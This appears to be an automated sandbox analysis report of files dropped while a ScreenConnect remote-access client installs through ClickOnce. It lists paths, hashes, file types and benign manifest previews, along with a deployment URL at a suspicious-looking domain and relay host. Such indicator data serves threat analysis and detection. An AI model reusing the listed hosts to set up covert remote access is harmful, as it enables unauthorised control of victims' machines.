                                                                                                                                                                                                SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu
                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):847
                                                                                                                                                                                                Entropy (8bit):5.345615485833535
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (607), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):14704
                                                                                                                                                                                                Entropy (8bit):3.8052493592965173
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:t6BKnBqdl2CE+Lpn15UBBaOy0l9Bqdl2CE+LpnkKFn/p8Tk9uBqdl2CE+LpnpcpA:tFx+FnrUa6Fx+Fnb9IFx+FnenLEv
                                                                                                                                                                                                MD5:D361986288A40BA4D1F9149977AF09CF
                                                                                                                                                                                                SHA1:820104FB05613422B162BFF07925E1C55C6D43D4
                                                                                                                                                                                                SHA-256:F0A17F728FD966A2F18403EFDAC4D26F348B1AF2E42F7F4CE7D456896141F314
                                                                                                                                                                                                SHA-512:018470FC6EF01B2281B4254EE7C52FBB49E93F09A433235DF6140D38D4ABE2726FC10E5EBB90F0707A5958063B65E0BA99AFD95717809A428CD6D09D524575DB
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:PLATFORM VERSION INFO.. Windows : 10.0.19045.0 (Win32NT).. Common Language Runtime : 4.0.30319.42000.. System.Deployment.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. clr.dll : 4.8.4515.0 built by: NET48REL1LAST_C.. dfdll.dll : 4.8.4270.0 built by: NET48REL1LAST_C.. dfshim.dll : 10.0.19041.30000 (WinBuild.160101.0800)....SOURCES.. Deployment url : https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):197120
                                                                                                                                                                                                Entropy (8bit):6.58476728626163
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                                                                                                                                                                MD5:AE0E6EBA123683A59CAE340C894260E9
                                                                                                                                                                                                SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                                                                                                                                                                SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                                                                                                                                                                SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1041
                                                                                                                                                                                                Entropy (8bit):5.147328807370198
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
                                                                                                                                                                                                MD5:2EA1AC1E39B8029AA1D1CEBB1079C706
                                                                                                                                                                                                SHA1:5788C00093D358F8B3D8A98B0BEF5D0703031E3F
                                                                                                                                                                                                SHA-256:8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
                                                                                                                                                                                                SHA-512:6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):68096
                                                                                                                                                                                                Entropy (8bit):6.068776675019683
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                                                                                                                                                                MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                                                                                                                                                                SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                                                                                                                                                                SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                                                                                                                                                                SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1636
                                                                                                                                                                                                Entropy (8bit):5.084538887646832
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
                                                                                                                                                                                                MD5:E11E5D85F8857144751D60CED3FAE6D7
                                                                                                                                                                                                SHA1:7E0AE834C6B1DEA46B51C3101852AFEEA975D572
                                                                                                                                                                                                SHA-256:ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
                                                                                                                                                                                                SHA-512:5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):95520
                                                                                                                                                                                                Entropy (8bit):6.505346220942731
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                                                                                                                                                                MD5:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                                                SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                                                                                                                                                                SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                                                                                                                                                                SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):548864
                                                                                                                                                                                                Entropy (8bit):6.031251664661689
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                                                                                                                                MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                                                                                                                                SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                                                                                                                                SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                                                                                                                                SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1216
                                                                                                                                                                                                Entropy (8bit):5.1303806593325705
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                                                MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                                                SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                                                SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                                                SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1721856
                                                                                                                                                                                                Entropy (8bit):6.639136400085158
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                                                                                                                                                                MD5:9F823778701969823C5A01EF3ECE57B7
                                                                                                                                                                                                SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                                                                                                                                                                SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                                                                                                                                                                SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1982
                                                                                                                                                                                                Entropy (8bit):5.057585371364542
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
                                                                                                                                                                                                MD5:50FC8E2B16CC5920B0536C1F5DD4AEAE
                                                                                                                                                                                                SHA1:6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
                                                                                                                                                                                                SHA-256:95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
                                                                                                                                                                                                SHA-512:BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):61216
                                                                                                                                                                                                Entropy (8bit):6.31175789874945
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                                                                                                                                MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                                                                                                                                SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                                                                                                                                SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                                                                                                                                SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):601376
                                                                                                                                                                                                Entropy (8bit):6.185921191564225
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                                                                                                                                MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                                                SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                                                                                                                                SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                                                                                                                                SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):266
                                                                                                                                                                                                Entropy (8bit):4.842791478883622
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):2573
                                                                                                                                                                                                Entropy (8bit):5.026361555169168
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
                                                                                                                                                                                                MD5:3133DE245D1C278C1C423A5E92AF63B6
                                                                                                                                                                                                SHA1:D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
                                                                                                                                                                                                SHA-256:61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
                                                                                                                                                                                                SHA-512:B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.
                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):17866
                                                                                                                                                                                                Entropy (8bit):5.954687824833028
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                                                MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                                                SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                                                SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                                                SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                                                Malicious:false
